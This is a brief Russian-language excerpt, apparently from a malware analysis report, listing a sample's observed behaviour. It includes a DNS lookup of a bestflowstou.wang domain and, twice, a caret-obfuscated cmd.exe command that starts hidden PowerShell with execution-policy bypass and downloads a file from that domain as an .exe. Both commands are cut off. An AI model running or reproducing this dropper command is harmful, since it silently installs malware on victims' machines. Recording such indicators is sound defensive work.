Техническая информация
- http://bestflowstou.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^o^weRSheLl.exe^ -eXecUTIO^NpO^L^i^c^Y ^BypasS -n^o^pRof^I^lE -wi^nDowS^TylE Hi^Dd^EN (nEW^-^O^B^Je^C^T^ SySTE^M^.N^eT^.W^E^b^c^L^IENT).dO^w^nLo^ADf^I^lE('http://bestflowst...
- DNS ASK be####owstou.wang
- '<SYSTEM32>\cmd.exe' /C "P^o^weRSheLl.exe^ -eXecUTIO^NpO^L^i^c^Y ^BypasS -n^o^pRof^I^lE -wi^nDowS^TylE Hi^Dd^EN (nEW^-^O^B^Je^C^T^ SySTE^M^.N^eT^.W^E^b^c^L^IENT).dO^w^nLo^ADf^I^lE('http://bestflowst...' (со скрытым окном)